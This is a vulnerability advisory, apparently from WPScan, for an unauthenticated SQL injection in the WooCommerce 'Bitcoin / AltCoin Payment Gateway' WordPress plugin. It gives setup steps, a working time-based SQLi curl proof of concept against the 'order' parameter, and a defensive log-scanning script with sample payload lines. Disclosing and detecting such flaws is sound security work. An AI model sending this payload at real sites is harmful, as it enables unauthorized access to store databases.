wpvulndb | Cydave | WPVDB-ID:2839FF82-7D37-4392-8FA3-D490680D42C4
Apr 17, 2023 - 12:00 a.m.

Bitcoin / AltCoin Payment Gateway <= 1.7.1 - Unauthenticated SQLi

2023-04-17 00:00:00
cydave
wpscan.com
Tags: bitcoin, altcoin, payment gateway, sql injection, unauthenticated users, woocommerce, vulnerability

EPSS: 0.002 (Low), Percentile: 57.7%

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

PoC

Setup:
1. Install woocommerce (dependency, no setup required)
2. Install the vulnerable plugin (woo-altcoin-payment-gateway version 1.7.1)
3. In the AltCoin Payment settings, enable the AltCoin payment gateway (/wp-admin/admin.php?page=cs-woo-altcoin-gateway-settings)
4. Add a new coin (/wp-admin/admin.php?page=cs-woo-altcoin-add-new-coin), with the following dummy values:
   Payment Confirmation Type: Manual
   Enter Coin Name: Bitcoin
   Enter Coin Wallet Address: 1KPLgee6crr7u1KQxwnnu4isizufxadVPZ
   Active / Deactivate: checked

Attack:
1. As an unauthenticated user, visit the main page of the WordPress instance to extract the nonce - CTRL+F for "cs_token"
2. Invoke the following curl command, with the just obtained nonce, to induce a 5 second sleep:

   time curl 'https://example.com/wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=&order=(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)' \
     --data 'method=admin\options\functions\Coin_List@prepare_items'
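
For defenders, a detection sketch over web server access logs, added here as an example and not part of the original advisory or the plugin: it flags requests to the `_cs_wapg_custom_call` AJAX action whose `order` parameter is anything other than a plain sort direction. The combined log format, the asc/desc allowlist and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a list-table sort direction should only ever be asc or desc.
ALLOWED_ORDER = {"asc", "desc"}
AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "_cs_wapg_custom_call"  # AJAX action named in the advisory

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_order(line):
    """Return the offending `order` value if the line hits the plugin's
    AJAX action with a non-allowlisted sort direction, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith(AJAX_PATH):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
    if ACTION not in params.get("action", []):
        return None
    for value in params.get("order", []):
        if value.strip().lower() not in ALLOWED_ORDER:
            return value
    return None

def scan(lines):
    """Yield (client_ip, order_value) for each flagged log line."""
    for line in lines:
        value = suspicious_order(line)
        if value is not None:
            yield line.split(" ", 1)[0], value

# Constructed sample log lines (documentation IP ranges, placeholder nonce).
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Apr/2023:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=NONCE&order=desc HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Apr/2023:10:00:05 +0000] "POST /wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=NONCE&order=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(5)%20ELSE%201%20END) HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/Apr/2023:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&order=xyz HTTP/1.1" 200 47',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} order={value!r}")
```

This only inspects the query string, which is where the PoC above places `action` and `order`; parameters sent in a request body do not appear in access logs and need a WAF or application-level check.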

CPE | Name | Operator | Version
woo-altcoin-payment-gateway | eq | *
